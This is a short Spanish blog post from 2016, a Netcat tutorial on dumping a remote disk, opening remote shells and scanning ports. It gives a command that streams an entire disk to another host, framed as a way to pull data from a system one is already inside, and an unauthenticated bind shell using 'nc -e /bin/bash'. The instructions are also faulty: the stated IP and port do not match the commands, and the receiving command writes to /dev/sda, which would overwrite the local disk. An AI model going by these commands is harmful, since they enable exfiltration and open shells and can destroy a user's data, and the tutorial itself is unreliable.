viernes, 10 de junio de 2016

Ncat: Escaneando puertos, abriendo shells remotas & volcando discos remotos.








Seguimos con Netcat, esta vez vamos a ver tres puntos concretos como menciona el título de la entrada. En primer lugar veremos como podemos realizar un volcado de disco remoto, esto es aplicable a carpetas más concretas y demás. Cuando estamos dentro de un sistema remoto o simplemente queremos mandar un volcado del sistema nos basta con dejar una orden pendiente con Netcat y ejecutar en el ordenador que querámos la orden Netcat para recibir dicho volcado por ejemplo.

En primero lugar ejecutamos la orden en el sistema que queremos extraer la información en este caso un sistema con ip "192.168.1.12" y aclaramos esa orden al puerto "8080". Sería como la siguiente orden.

dd if=/dev/sda | nc 192.168.0.1 9000
Una vez tenemos hecho esto ejecutamos la siguiente orden en el sistema que queramos volcar la información como muestra la siguiente orden.

nc -l -p 9000 | dd of=/dev/sda

Ahora tenemos el volcado de información en nuestro sistema. Netcat también nos ofrece la posibilidad de ejecutar shells remotas, es decir ejecutar una shell de otro sistema desde el nuestro con todo lo que ello conlleva. Lo que haremos es dejar en el sistema remoto un shell a la escucha mediante la orden "nc -l -p 8080 -e /bin/bash" y en el sistema donde queramos usar esa shell remota " nc direcionipremota 8080".



Por último veremos como escanear puertos mediante la orden "nc -v -w 1 localhost -z 1-3000". Donde escanearemos nuestro propio sistema en busca de puertos abiertos en este caso del 1-3000. En nuestro caso vemos que descubre un puerto abierto el 22.